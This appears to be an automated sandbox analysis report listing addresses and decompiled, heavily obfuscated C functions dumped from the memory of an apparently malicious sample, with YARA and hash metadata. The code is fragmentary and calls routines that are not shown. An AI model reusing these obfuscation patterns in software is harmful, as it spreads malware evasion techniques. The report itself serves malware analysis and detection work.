0x00239a6d
0x00239a70
0x00239a77
0x00239a7e
0x00239a85
0x00239a8c
0x00239a93
0x00239a97
0x00239aa4
0x00239aa7
0x00239aaa
0x00239ab1
0x00239ab8
0x00239abf
0x00239ac6
0x00239acd
0x00239ad4
0x00239adf
0x00239ae2
0x00239ae9
0x00239af0
0x00239af7
0x00239afe
0x00239b09
0x00239b0c
0x00239b10
0x00239b17
0x00239b1e
0x00239b22
0x00239b29
0x00239b34
0x00239b37
0x00239b45
0x00239b48
0x00239b4f
0x00239b59
0x00239b5c
0x00239b5f
0x00239b66
0x00239b6d
0x00239b74
0x00239b7b
0x00239b82
0x00239b89
0x00239b90
0x00239b97
0x00239b9e
0x00239ba5
0x00239bac
0x00239bb3
0x00239bba
0x00239bc1
0x00239bc8
0x00239bcf
0x00239bd6
0x00239bdf
0x00239be6
0x00239bed
0x00239bf4
0x00239bf8
0x00239bff
0x00239c06
0x00239c13
0x00239c16
0x00239c19
0x00239c20
0x00239c27
0x00239c2e
0x00239c32
0x00239c39
0x00239c47
0x00239c4a
0x00239c51
0x00239c58
0x00239c5f
0x00239c69
0x00239c6e
0x00239c76
0x00239c7b
0x00239c80
0x00239c87
0x00239c8e
0x00239c95
0x00239c9c
0x00239ca7
0x00239ca8
0x00239cab
0x00239cb2
0x00239cb9
0x00239cbd
0x00239cc4
0x00239ccb
0x00239cd2
0x00239cd9
0x00239ce0
0x00239ce7
0x00239ceb
0x00239cef
0x00239cf6
0x00239cfd
0x00239d09
0x00239d0c
0x00239d13
0x00239d1a
0x00239d25
0x00239d28
0x00239d2f
0x00239d36
0x00239d3d
0x00239d41
0x00239d48
0x00239d4f
0x00239d56
0x00239d5d
0x00239d64
0x00239d68
0x00239d6f
0x00239d76
0x00239d7d
0x00239d84
0x00239d8b
0x00239d92
0x00239d96
0x00239d9d
0x00239da8
0x00239dab
0x00239daf
0x00239daf
0x00239db6
0x00239db6
0x00239db6
0x00239db6
0x00239dbc
0x00000000
0x00000000
0x00239dc2
0x00239ee5
0x00239eea
0x00239eed
0x00000000
0x00239dc8
0x00239dce
0x00239ebf
0x00239ec4
0x00239ec7
0x00000000
0x00239dd4
0x00239dda
0x00239e9a
0x00239e9d
0x00239ea2
0x00000000
0x00239de0
0x00239de6
0x00239e79
0x00239e88
0x00239e8d
0x00239e90
0x00000000
0x00239dec
0x00239df2
0x00239e55
0x00239e64
0x00239e69
0x00239e6c
0x00000000
0x00239df4
0x00239dfa
0x00239e32
0x00239e37
0x00239e3c
0x00239e3f
0x00239e40
0x00239e42
0x00239e48
0x00000000
0x00239e48
0x00239dfc
0x00239e02
0x00000000
0x00239e08
0x00239e0b
0x00239e1a
0x00239e1f
0x00239e22
0x00000000
0x00239e22
0x00239e02
0x00239dfa
0x00239df2
0x00239de6
0x00239dda
0x00239dce
0x00239f45
0x00239f47
0x00239f4b
0x00239f4b
0x00239f52
0x00239f52
0x00239ef7
0x00239efd
0x00239fbe
0x00239fc3
0x00239fc6
0x00000000
0x00239f03
0x00239f03
0x00239f09
0x00239fa1
0x00239fa4
0x00000000
0x00239f0f
0x00239f0f
0x00239f15
0x00239f88
0x00239f8d
0x00239f90
0x00000000
0x00239f17
0x00239f17
0x00239f1d
0x00239f65
0x00239f6a
0x00239f6d
0x00000000
0x00239f1f
0x00239f1f
0x00239f25
0x00000000
0x00239f2b
0x00239f3d
0x00239f42
0x00239f25
0x00239f1d
0x00239f15
0x00239f09
0x00000000
0x00239fcb
0x00239fcb
0x00239fcb
0x00000000

Strings

'Vj, xrefs: 00239D96

Memory Dump Source

Source File: 00000007.00000002.2111086691.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.2111061429.0000000000230000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2111135016.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: 'Vj
API String ID: 0-2210790371
Opcode ID: 752dd2814c582dd95a6ec796e85cdc249e3cc29c0e69a297da20739e8b56e3d6
Instruction ID: 2a01e980c180af9460aa1de851f2b51b45cdc2a622f8b1d539ce2b9d131d501b
Opcode Fuzzy Hash: 752dd2814c582dd95a6ec796e85cdc249e3cc29c0e69a297da20739e8b56e3d6
Instruction Fuzzy Hash: D1F132B2C1031ADBDF18DFE5C98A9DEBBB1FB04314F248159D416BA2A0D7B41A95CF41

Uniqueness

Uniqueness Score: -1.00%

Function 00241BDF, Relevance: 1.5, Strings: 1, Instructions: 283
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00241BDF() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				unsigned int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				unsigned int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				char _v112;
				short _t303;
				void* _t311;
				void* _t314;
				void* _t315;
				intOrPtr _t347;
				void* _t348;
				short* _t349;
				void* _t350;
				short* _t351;
				short* _t352;
				signed int _t353;
				signed int _t354;
				signed int _t355;
				signed int _t356;
				signed int _t357;
				signed int _t358;
				signed int _t359;
				signed int _t360;
				signed int _t361;
				signed int _t362;
				signed int _t363;
				signed int _t364;
				void* _t365;

				_t347 =  *0x24ca2c; // 0x5d8300
				_v48 = 0xd714;
				_t348 = _t347 + 0x230;
				_v48 = _v48 ^ 0xcd668ab2;
				_t315 = 0x3a31b660;
				_v48 = _v48 | 0x2f181106;
				_v48 = _v48 ^ 0xef7e1823;
				_v84 = 0x5d44;
				_t353 = 0x2d;
				_v84 = _v84 / _t353;
				_v84 = _v84 ^ 0x00001499;
				_v28 = 0xf70b;
				_t354 = 0xd;
				_v28 = _v28 / _t354;
				_v28 = _v28 | 0x6a0646bd;
				_v28 = _v28 >> 1;
				_v28 = _v28 ^ 0x35037bad;
				_v24 = 0xed7c;
				_v24 = _v24 + 0xffff8d1e;
				_v24 = _v24 + 0xffff0c72;
				_t355 = 0x48;
				_v24 = _v24 / _t355;
				_v24 = _v24 ^ 0x038e22ac;
				_v64 = 0x5fc5;
				_v64 = _v64 >> 4;
				_v64 = _v64 << 1;
				_v64 = _v64 ^ 0x000058c3;
				_v92 = 0x2688;
				_v92 = _v92 | 0xea27999c;
				_v92 = _v92 ^ 0xea278961;
				_v96 = 0x4a14;
				_t356 = 0x1f;
				_v96 = _v96 / _t356;
				_v96 = _v96 ^ 0x0000119a;
				_v36 = 0xd568;
				_v36 = _v36 ^ 0xbcd770ac;
				_v36 = _v36 << 6;
				_v36 = _v36 << 8;
				_v36 = _v36 ^ 0xe97134d4;
				_v68 = 0xedd2;
				_t357 = 0x63;
				_v68 = _v68 * 0x5e;
				_v68 = _v68 + 0xde9c;
				_v68 = _v68 ^ 0x00587d35;
				_v32 = 0x24d4;
				_v32 = _v32 << 9;
				_v32 = _v32 ^ 0x2e569407;
				_v32 = _v32 << 0xf;
				_v32 = _v32 ^ 0x9e03fcb0;
				_v104 = 0x1c4d;
				_v104 = _v104 + 0xfffffff9;
				_v104 = _v104 ^ 0x00005633;
				_v40 = 0xb450;
				_v40 = _v40 + 0x94db;
				_v40 = _v40 | 0x3dcacfe3;
				_v40 = _v40 / _t357;
				_v40 = _v40 ^ 0x009f9709;
				_v100 = 0x6d07;
				_t358 = 0x45;
				_v100 = _v100 * 0x69;
				_v100 = _v100 ^ 0x002cf62e;
				_v72 = 0x5e87;
				_v72 = _v72 / _t358;
				_v72 = _v72 + 0xffff9f14;
				_v72 = _v72 ^ 0xffffe852;
				_v56 = 0x964f;
				_v56 = _v56 << 0xd;
				_v56 = _v56 + 0x58a7;
				_v56 = _v56 ^ 0x12ca7579;
				_v8 = 0x11e7;
				_t359 = 0x26;
				_v8 = _v8 * 0x7e;
				_v8 = _v8 << 7;
				_v8 = _v8 / _t359;
				_v8 = _v8 ^ 0x001dbdc0;
				_v52 = 0x5afe;
				_t360 = 0x23;
				_v52 = _v52 * 0x24;
				_v52 = _v52 / _t360;
				_v52 = _v52 ^ 0x00001a55;
				_v88 = 0xb83d;
				_v88 = _v88 >> 0xd;
				_v88 = _v88 ^ 0x00006413;
				_v20 = 0x5af3;
				_t361 = 0x3a;
				_v20 = _v20 * 0x6b;
				_v20 = _v20 + 0x6d49;
				_v20 = _v20 ^ 0x8eb5ed48;
				_v20 = _v20 ^ 0x8e93dded;
				_v16 = 0x70c;
				_v16 = _v16 / _t361;
				_v16 = _v16 + 0xffff5089;
				_v16 = _v16 | 0x770f0b4d;
				_v16 = _v16 ^ 0xffff12de;
				_v60 = 0xa79c;
				_v60 = _v60 | 0xbac1c5ec;
				_v60 = _v60 + 0x6b12;
				_v60 = _v60 ^ 0xbac228f9;
				_v12 = 0x5546;
				_v12 = _v12 << 0xc;
				_v12 = _v12 >> 0xd;
				_v12 = _v12 * 0x74;
				_v12 = _v12 ^ 0x001372eb;
				_v80 = 0x25db;
				_v80 = _v80 << 0xd;
				_v80 = _v80 << 3;
				_v80 = _v80 ^ 0x25db4552;
				_v44 = 0xe1b0;
				_v44 = _v44 + 0xffff2f0e;
				_v44 = _v44 | 0x46f5308b;
				_v44 = _v44 * 0x56;
				_v44 = _v44 ^ 0xd65e5bab;
				_v108 = 0x5856;
				_v108 = _v108 ^ 0x78cd5bef;
				_v108 = _v108 ^ 0x78cd26cd;
				_v76 = 0xfba5;
				_v76 = _v76 + 0xffff77ce;
				_t362 = 0x11;
				_v76 = _v76 / _t362;
				_v76 = _v76 ^ 0x00005641;
				_t314 = 2;
				do {
					while(_t315 != 0x1de3f48) {
						if(_t315 == 0x1f19b69e) {
							_t363 = E002378A5(_t315, _t315, 0x10, _t315, 4);
							E00237787(_v96, 1, _v36,  &_v112, _v68, _v32, _t348);
							_t350 = _t348 + _t314;
							E00237787(_v104, _t363, _v40,  &_v112, _v100, _v72, _t350);
							_t365 = _t365 + 0x40;
							_t351 = _t350 + _t363 * 2;
							_t315 = 0x344e60d4;
							_t303 = 0x5c;
							 *_t351 = _t303;
							_t348 = _t351 + _t314;
							continue;
						} else {
							if(_t315 == 0x344e60d4) {
								_t364 = E002378A5(_t315, _t315, 0x10, _t315, 4);
								E00237787(_v20, _t364, _v16,  &_v112, _v60, _v12, _t348);
								_t365 = _t365 + 0x28;
								_t352 = _t348 + _t364 * 2;
								_t315 = 0x1de3f48;
								_t311 = 0x2e;
								 *_t352 = _t311;
								_t348 = _t352 + _t314;
								continue;
							} else {
								if(_t315 == 0x3a31b660) {
									_t311 = E00248C8F(_t315);
									_v112 = _t311;
									_t315 = 0x1f19b69e;
									continue;
								}
							}
						}
						goto L9;
					}
					E00237787(_v80, 3, _v44,  &_v112, _v108, _v76, _t348);
					_t349 = _t348 + 6;
					_t365 = _t365 + 0x18;
					_t315 = 0x2228f3b5;
					 *_t349 = 0;
					_t348 = _t349 + _t314;
					L9:
				} while (_t315 != 0x2228f3b5);
				return _t311;
			}

0x00241be8
0x00241bf0
0x00241bf7
0x00241bfd
0x00241c04
0x00241c09
0x00241c10
0x00241c17
0x00241c23
0x00241c28
0x00241c2d
0x00241c34
0x00241c3e
0x00241c43
0x00241c48
0x00241c4f
0x00241c52
0x00241c59
0x00241c60
0x00241c67
0x00241c71
0x00241c76
0x00241c7b
0x00241c82
0x00241c89
0x00241c8d
0x00241c90
0x00241c97
0x00241c9e
0x00241ca5
0x00241cac
0x00241cb6
0x00241cbb
0x00241cc0
0x00241cc7
0x00241cce
0x00241cd5
0x00241cd9
0x00241cdd
0x00241ce4
0x00241cef
0x00241cf0
0x00241cf3
0x00241cfa
0x00241d01
0x00241d08
0x00241d0c
0x00241d13
0x00241d17
0x00241d1e
0x00241d25
0x00241d29
0x00241d30
0x00241d37
0x00241d3e
0x00241d4a
0x00241d4d
0x00241d54
0x00241d63
0x00241d66
0x00241d69
0x00241d70
0x00241d7e
0x00241d81
0x00241d88
0x00241d8f
0x00241d96
0x00241d9a
0x00241da1
0x00241da8
0x00241db3
0x00241db6
0x00241db9
0x00241dc4
0x00241dc7
0x00241dce
0x00241dd9
0x00241ddc
0x00241de6
0x00241de9
0x00241df0
0x00241df7
0x00241dfb
0x00241e02
0x00241e0d
0x00241e0e
0x00241e11
0x00241e18
0x00241e1f
0x00241e26
0x00241e32
0x00241e35
0x00241e3c
0x00241e43
0x00241e4a
0x00241e51
0x00241e58
0x00241e5f
0x00241e66
0x00241e6d
0x00241e71
0x00241e79
0x00241e7c
0x00241e83
0x00241e8a
0x00241e8e
0x00241e92
0x00241e99
0x00241ea0
0x00241ea7
0x00241eb2
0x00241eb5
0x00241ebc
0x00241ec3
0x00241eca
0x00241ed1
0x00241ed8
0x00241ee6
0x00241eeb
0x00241eee
0x00241ef5
0x00241ef6
0x00241ef6
0x00241f08
0x00241f99
0x00241fac
0x00241fb1
0x00241fc8
0x00241fcd
0x00241fd0
0x00241fd3
0x00241fda
0x00241fdb
0x00241fde
0x00000000
0x00241f0a
0x00241f10
0x00241f4e
0x00241f61
0x00241f66
0x00241f69
0x00241f6c
0x00241f73
0x00241f74
0x00241f77
0x00000000
0x00241f12
0x00241f18
0x00241f24
0x00241f29
0x00241f2c
0x00000000
0x00241f2c
0x00241f18
0x00241f10
0x00000000
0x00241f08
0x00241ffb
0x00242000
0x00242005
0x00242008
0x0024200d
0x00242010
0x00242012
0x00242012
0x00242024

Strings

5}X, xrefs: 00241CFA

Memory Dump Source

Source File: 00000007.00000002.2111086691.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.2111061429.0000000000230000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2111135016.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: 5}X
API String ID: 0-583016468
Opcode ID: 41f23d691eded75a4c5d26948b97aef5649f4da60e163df8d87d3f6fd7295143
Instruction ID: 48f39576d59cc28e0cb94ab9f27c8200e0cde33933494a9c14db3c91316877e3
Opcode Fuzzy Hash: 41f23d691eded75a4c5d26948b97aef5649f4da60e163df8d87d3f6fd7295143
Instruction Fuzzy Hash: 4CD12271D10319EBDB18CFE5C88A9DEBBB1FF44314F208019E512BA2A0D7B91A56CF90

Uniqueness

Uniqueness Score: -1.00%

Function 002362A3, Relevance: 1.4, Strings: 1, Instructions: 178
COMMONCrypto

Download Yara Rule

C-Code - Quality: 89%

			E002362A3() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				char _v608;
				char _v1128;
				void* _t179;
				void* _t180;
				intOrPtr _t182;
				void* _t190;
				intOrPtr _t206;
				void* _t209;
				signed int _t210;
				signed int _t211;
				signed int _t212;
				void* _t214;

				_v88 = 0xf2dad;
				_t209 = 0;
				_t190 = 0x374ac1da;
				_v84 = _v84 & 0;
				_v40 = 0xb12b;
				_v40 = _v40 << 0xe;
				_v40 = _v40 >> 0xf;
				_v40 = _v40 ^ 0x000058bc;
				_v60 = 0xf727;
				_t210 = 0x4f;
				_v60 = _v60 / _t210;
				_v60 = _v60 ^ 0x00007065;
				_v8 = 0x9eec;
				_v8 = _v8 + 0xd770;
				_v8 = _v8 >> 0xe;
				_v8 = _v8 >> 6;
				_v8 = _v8 ^ 0x00000fb6;
				_v44 = 0x7887;
				_v44 = _v44 << 5;
				_v44 = _v44 >> 0xc;
				_v44 = _v44 ^ 0x00001109;
				_v16 = 0xef0c;
				_t211 = 0x7a;
				_v16 = _v16 * 0x14;
				_v16 = _v16 ^ 0xca26cbdc;
				_v16 = _v16 | 0x7bdc5f23;
				_v16 = _v16 ^ 0xfbfc55fd;
				_v76 = 0xd8b4;
				_v76 = _v76 + 0x9c32;
				_v76 = _v76 ^ 0x00017966;
				_v36 = 0x1b76;
				_v36 = _v36 + 0x8638;
				_v36 = _v36 | 0x465c0394;
				_v36 = _v36 ^ 0x465cdef1;
				_v28 = 0xf8c7;
				_v28 = _v28 ^ 0x90f840f6;
				_v28 = _v28 / _t211;
				_v28 = _v28 ^ 0x01300a73;
				_v80 = 0x4878;
				_v80 = _v80 ^ 0xf33f81bb;
				_v80 = _v80 ^ 0xf33fed7c;
				_v12 = 0x5e32;
				_v12 = _v12 >> 5;
				_v12 = _v12 | 0xb939d170;
				_v12 = _v12 + 0xffffe46d;
				_v12 = _v12 ^ 0xb939c5f3;
				_v72 = 0xdcc7;
				_t212 = 5;
				_v72 = _v72 / _t212;
				_v72 = _v72 ^ 0x00000998;
				_v52 = 0xf409;
				_v52 = _v52 >> 7;
				_v52 = _v52 >> 2;
				_v52 = _v52 ^ 0x00002b61;
				_v20 = 0x5cd8;
				_v20 = _v20 + 0x5908;
				_v20 = _v20 * 0x1c;
				_v20 = _v20 * 0x14;
				_v20 = _v20 ^ 0x018d9ab8;
				_v32 = 0x162d;
				_v32 = _v32 + 0xffff1b5c;
				_v32 = _v32 >> 3;
				_v32 = _v32 ^ 0x1fff9926;
				_v64 = 0x95af;
				_v64 = _v64 + 0xffff7063;
				_v64 = _v64 ^ 0x00004670;
				_v56 = 0xeead;
				_v56 = _v56 + 0xffffd284;
				_v56 = _v56 ^ 0x94a6c65a;
				_v56 = _v56 ^ 0x94a662be;
				_v68 = 0xa18;
				_v68 = _v68 >> 0xa;
				_v68 = _v68 ^ 0x0000400d;
				_v48 = 0xd4d3;
				_v48 = _v48 * 3;
				_v48 = _v48 << 3;
				_v48 = _v48 ^ 0x0013dfa3;
				_v24 = 0x2d4a;
				_v24 = _v24 << 9;
				_v24 = _v24 + 0x17ff;
				_v24 = _v24 ^ 0x005aa30d;
				do {
					while(_t190 != 0x17ec002) {
						if(_t190 == 0x20702549) {
							_push(_v36);
							_t180 = E0024889D(0x24c930, _v76, __eflags);
							_t182 =  *0x24ca2c; // 0x5d8300
							_t206 =  *0x24ca2c; // 0x5d8300
							E002329E3(_t206, 0x104, _t180, _v28, _v80, _v12, _t182 + 0x230,  &_v1128, _v72, _v52);
							E00242025(_v20, _t180, _v32, _v64);
							_t214 = _t214 + 0x30;
							_t190 = 0x17ec002;
							continue;
						} else {
							if(_t190 == 0x374ac1da) {
								_push(_t190);
								_push(_t190);
								E0023C6C7(_v60, _v8,  &_v608, _t190, _v44, _v40, _v16);
								_t214 = _t214 + 0x1c;
								_t190 = 0x20702549;
								continue;
							}
						}
						goto L7;
					}
					_push(_t190);
					_push(_v24);
					_push(0);
					_push(_v48);
					_push(0);
					_push(_v68);
					_push( &_v1128);
					_t179 = E0023568E(_v56, 0);
					_t214 = _t214 + 0x1c;
					__eflags = _t179;
					_t209 =  !=  ? 1 : _t209;
					_t190 = 0x3985ca2d;
					L7:
					__eflags = _t190 - 0x3985ca2d;
				} while (__eflags != 0);
				return _t209;
			}

0x002362ac
0x002362b8
0x002362ba
0x002362bf
0x002362c2
0x002362c9
0x002362cd
0x002362d1
0x002362d8
0x002362e4
0x002362e9
0x002362ee
0x002362f5
0x002362fc
0x00236303
0x00236307
0x0023630b
0x00236312
0x00236319
0x0023631d
0x00236321
0x00236328
0x00236333
0x00236336
0x00236339
0x00236340
0x00236347
0x0023634e
0x00236355
0x0023635c
0x00236363
0x0023636a
0x00236371
0x00236378
0x0023637f
0x00236386
0x00236394
0x00236397
0x0023639e
0x002363a5
0x002363ac
0x002363b3
0x002363ba
0x002363be
0x002363c5
0x002363cc
0x002363d3
0x002363dd
0x002363e0
0x002363e3
0x002363ea
0x002363f1
0x002363f5
0x002363f9
0x00236400
0x00236407
0x00236412
0x00236419
0x0023641c
0x00236423
0x0023642a
0x00236431
0x00236435
0x0023643c
0x00236448
0x0023644f
0x00236456
0x0023645d
0x00236464
0x0023646b
0x00236472
0x00236479
0x0023647d
0x00236484
0x0023648f
0x00236492
0x00236496
0x0023649d
0x002364a4
0x002364a8
0x002364af
0x002364b6
0x002364b6
0x002364c4
0x002364f7
0x00236502
0x0023651c
0x00236530
0x0023653c
0x0023654c
0x00236551
0x00236554
0x00000000
0x002364c6
0x002364cc
0x002364d2
0x002364d3
0x002364eb
0x002364f0
0x002364f3
0x00000000
0x002364f3
0x002364cc
0x00000000
0x002364c4
0x0023655e
0x0023655f
0x0023656a
0x0023656c
0x0023656f
0x00236571
0x00236577
0x00236578
0x0023657f
0x00236583
0x00236585
0x00236588
0x0023658d
0x0023658d
0x0023658d
0x002365a1

Strings

I%p , xrefs: 00236443

Memory Dump Source

Source File: 00000007.00000002.2111086691.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.2111061429.0000000000230000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2111135016.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: I%p
API String ID: 0-3985577374
Opcode ID: 1ebaacfafbb8682e308955186b096315e6411cf54a78987b24709f6093b57f13
Instruction ID: 405aef8c95797cb1f7e88075a49a34c9250c0f636685104075666483c38cc432
Opcode Fuzzy Hash: 1ebaacfafbb8682e308955186b096315e6411cf54a78987b24709f6093b57f13
Instruction Fuzzy Hash: 368136B1D0021DABDF18CFE5D94A9DEBBB5FB44318F208059E112B62A0D7B80A09CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00240D33, Relevance: 1.4, Strings: 1, Instructions: 122
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E00240D33(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				unsigned int _v36;
				signed int _v40;
				signed int _v44;
				char _v48;
				void* _t128;
				signed int _t155;
				signed int _t156;
				signed int _t157;
				signed int _t158;
				void* _t173;
				signed int _t174;

				_push(_a12);
				_t173 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0023602B(_t128);
				_v8 = 0x6813;
				_v8 = _v8 << 6;
				_v8 = _v8 ^ 0xf4e07894;
				_v8 = _v8 | 0x641e1778;
				_v8 = _v8 ^ 0xf4fe1535;
				_v16 = 0x7d9d;
				_t155 = 0x16;
				_v16 = _v16 * 0x4d;
				_v16 = _v16 ^ 0x0025b62f;
				_v32 = 0xbd8b;
				_v32 = _v32 ^ 0xdfb27dce;
				_v32 = _v32 / _t155;
				_v32 = _v32 ^ 0x0a2b09ce;
				_v28 = 0xad22;
				_t156 = 0x34;
				_v28 = _v28 * 0x47;
				_v28 = _v28 + 0x4161;
				_v28 = _v28 ^ 0x00307d44;
				_v36 = 0xa165;
				_v36 = _v36 >> 2;
				_v36 = _v36 ^ 0x00006be3;
				_v12 = 0xca43;
				_v12 = _v12 << 7;
				_v12 = _v12 + 0x4480;
				_v12 = _v12 >> 0x10;
				_v12 = _v12 ^ 0x00004998;
				_v44 = 0xc326;
				_v44 = _v44 / _t156;
				_v44 = _v44 ^ 0x000051cc;
				_v40 = 0xa768;
				_v40 = _v40 / _t156;
				_v40 = _v40 ^ 0x00002cdd;
				_v24 = 0x8f0;
				_v24 = _v24 << 2;
				_v24 = _v24 + 0xffff08f5;
				_v24 = _v24 | 0x28f06395;
				_v24 = _v24 ^ 0xffff76ac;
				_v20 = 0x26e;
				_v20 = _v20 + 0xffffc9ca;
				_v20 = _v20 + 0x3d88;
				_v20 = _v20 * 0x16;
				_v20 = _v20 ^ 0x00008c1f;
				_v48 = E00248C8F(_t156);
				_v8 = 0xba8c;
				_v8 = _v8 + 0xffff546f;
				_v8 = _v8 | 0xb28855c5;
				_v8 = _v8 ^ 0xa47da239;
				_v8 = _v8 ^ 0x16f5fdc2;
				_v16 = 0x4025;
				_t157 = 0xb;
				_v16 = _v16 / _t157;
				_v16 = _v16 + 0xffffba03;
				_t158 = 0x3b;
				_v16 = _v16 / _t158;
				_v16 = _v16 ^ 0x0456c691;
				_t174 = E002378A5(_t158, _t158, _v16, _t158, _v8);
				E00237787(_v44, _t174, _v40,  &_v48, _v24, _v20, _t173);
				 *((short*)(_t173 + _t174 * 2)) = 0;
				return 0;
			}

0x00240d3b
0x00240d3e
0x00240d40
0x00240d43
0x00240d47
0x00240d48
0x00240d4d
0x00240d57
0x00240d5d
0x00240d64
0x00240d6b
0x00240d72
0x00240d7f
0x00240d82
0x00240d85
0x00240d8c
0x00240d93
0x00240da1
0x00240da4
0x00240dab
0x00240db6
0x00240db7
0x00240dba
0x00240dc1
0x00240dc8
0x00240dcf
0x00240dd3
0x00240dda
0x00240de1
0x00240de5
0x00240dec
0x00240df0
0x00240df7
0x00240e05
0x00240e08
0x00240e0f
0x00240e1b
0x00240e1e
0x00240e25
0x00240e2c
0x00240e30
0x00240e37
0x00240e3e
0x00240e45
0x00240e4c
0x00240e53
0x00240e5e
0x00240e61
0x00240e73
0x00240e78
0x00240e7f
0x00240e86
0x00240e8d
0x00240e94
0x00240e9b
0x00240ea7
0x00240eaa
0x00240eaf
0x00240ebb
0x00240ebe
0x00240ec1
0x00240ee5
0x00240ef8
0x00240f02
0x00240f0b

Strings

D}0, xrefs: 00240DC1

Memory Dump Source

Source File: 00000007.00000002.2111086691.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.2111061429.0000000000230000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2111135016.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: D}0
API String ID: 0-882559769
Opcode ID: 0055a96e36ec0fc3778ffa7d8bdc67593becc071738deaf1b770c418e059c371
Instruction ID: 3aabd78dde7f964da65a72716f7d4680d5e5eff9a6f5c417d18b436eebb78e11
Opcode Fuzzy Hash: 0055a96e36ec0fc3778ffa7d8bdc67593becc071738deaf1b770c418e059c371
Instruction Fuzzy Hash: 6951F3B2D0120AEBDF09CFA5C94A8EEBBB2FB44304F108199E111B6250D7B95B55CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0024340A, Relevance: 1.4, Strings: 1, Instructions: 118
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E0024340A(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				void* _t88;
				void* _t94;
				void* _t100;
				void* _t102;
				intOrPtr _t117;
				signed int _t118;
				signed int* _t121;

				_t116 = _a8;
				_t100 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0023602B(_t88);
				_v88 = 0x94797;
				_t117 = 0;
				_v84 = 0xfccb1;
				_t121 =  &(( &_v124)[4]);
				_v80 = 0;
				_v120 = 0xe518;
				_t102 = 0x2e39b5d1;
				_v120 = _v120 >> 0xf;
				_v120 = _v120 | 0x8d2dde7f;
				_v120 = _v120 ^ 0x46a7e325;
				_v120 = _v120 ^ 0xcb8a2201;
				_v124 = 0x16d5;
				_v124 = _v124 >> 0xe;
				_v124 = _v124 | 0x69fc1cf8;
				_t118 = 0x78;
				_v124 = _v124 * 0x21;
				_v124 = _v124 ^ 0xa97fd862;
				_v104 = 0xc3ad;
				_v104 = _v104 * 0x54;
				_v104 = _v104 ^ 0x00400d02;
				_v112 = 0x42c5;
				_v112 = _v112 ^ 0xf5e3cf1a;
				_v112 = _v112 ^ 0xb2e8281c;
				_v112 = _v112 | 0x1ecbfa7f;
				_v112 = _v112 ^ 0x5fcbcd35;
				_v96 = 0xbfa3;
				_v96 = _v96 ^ 0x0400a118;
				_v96 = _v96 ^ 0x04005591;
				_v116 = 0x719c;
				_v116 = _v116 / _t118;
				_v116 = _v116 << 3;
				_v116 = _v116 + 0xbb41;
				_v116 = _v116 ^ 0x0000fc42;
				_v100 = 0x8c7a;
				_v100 = _v100 << 3;
				_v100 = _v100 ^ 0x0004412d;
				_v92 = 0xd0f9;
				_v92 = _v92 + 0xffffb579;
				_v92 = _v92 ^ 0x0000a3c3;
				_v108 = 0x6440;
				_v108 = _v108 ^ 0x55818320;
				_v108 = _v108 << 0xf;
				_v108 = _v108 + 0x2c19;
				_v108 = _v108 ^ 0xf3b003dd;
				do {
					while(_t102 != 0x4681a3b) {
						if(_t102 == 0xbf6d415) {
							__eflags = E0023B055(_v92, _v108, __eflags,  &_v76, _t116 + 4);
							_t117 =  !=  ? 1 : _t117;
						} else {
							if(_t102 == 0x17b92136) {
								E002450F2( &_v76, _v120, _v124, _v104, _t100);
								_t121 =  &(_t121[3]);
								_t102 = 0x4681a3b;
								continue;
							} else {
								if(_t102 != 0x2e39b5d1) {
									goto L10;
								} else {
									_t102 = 0x17b92136;
									continue;
								}
							}
						}
						L13:
						return _t117;
					}
					_t94 = E00248F11( &_v76, _v112, _v96, _t116, _v116, _v100);
					_t121 =  &(_t121[4]);
					__eflags = _t94;
					if(__eflags == 0) {
						_t102 = 0x114ebae0;
						goto L10;
					} else {
						_t102 = 0xbf6d415;
						continue;
					}
					goto L13;
					L10:
					__eflags = _t102 - 0x114ebae0;
				} while (__eflags != 0);
				goto L13;
			}

0x00243411
0x00243418
0x0024341a
0x0024341b
0x00243422
0x00243423
0x00243424
0x00243429
0x00243431
0x00243433
0x0024343b
0x0024343e
0x00243444
0x0024344c
0x00243451
0x00243456
0x0024345e
